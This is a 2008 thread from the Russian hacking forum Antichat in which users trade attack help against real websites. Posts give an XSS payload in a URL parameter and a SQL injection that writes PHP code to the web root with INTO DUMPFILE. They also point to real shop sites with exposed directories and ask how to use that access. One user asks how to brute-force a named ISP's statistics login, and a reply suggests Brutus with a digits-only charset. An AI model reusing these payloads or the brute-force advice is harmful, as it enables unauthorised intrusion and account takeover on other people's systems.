HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.03.2008, 15:45
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Hell0, www.superpupersait.run/superpupersait.php?id='"><script>alert()</script>
 
Ответить с цитированием

  #2  
Старый 31.03.2008, 16:06
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
Провел на форуме:
7126

Репутация: 0
По умолчанию

результат
'%22%3E%3Cscript%3Ealert()%3C/script%3E
и в форме '\"\><script>alert()</script>
поставили слэши

зато я нашел php.ini в другой деректории и еще коечто как бы мне вытощить
 
Ответить с цитированием

  #3  
Старый 31.03.2008, 16:09
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

кинь ссылку удобнее будет
 
Ответить с цитированием

  #4  
Старый 31.03.2008, 16:55
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
Провел на форуме:
7126

Репутация: 0
По умолчанию

Не могу если найду подобный сайт напишу
 
Ответить с цитированием

  #5  
Старый 31.03.2008, 20:30
Lidloses_Auge
Новичок
Регистрация: 04.01.2008
Сообщений: 6
Провел на форуме:
24208

Репутация: 21
По умолчанию

Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

e.g:

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*

Works!

But

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*

doesn work!

Is there a possibility to dump files, if magic_quotes_gpc ist switched on?

Thank you.
 
Ответить с цитированием

  #6  
Старый 31.03.2008, 20:43
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
Провел на форуме:
7126

Репутация: 0
По умолчанию

Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/

Последний раз редактировалось Hell0; 31.03.2008 в 21:01..
 
Ответить с цитированием

  #7  
Старый 03.04.2008, 17:50
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
Провел на форуме:
7126

Репутация: 0
По умолчанию

Подскажите, что можно зделать есть маленький доступ

http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает
 
Ответить с цитированием

  #8  
Старый 31.03.2008, 20:47
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9  
Старый 31.03.2008, 21:14
Dr.Dre2
Новичок
Регистрация: 31.03.2008
Сообщений: 2
Провел на форуме:
5572

Репутация: 0
По умолчанию

Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/

Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит .
 
Ответить с цитированием

  #10  
Старый 01.04.2008, 15:25
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ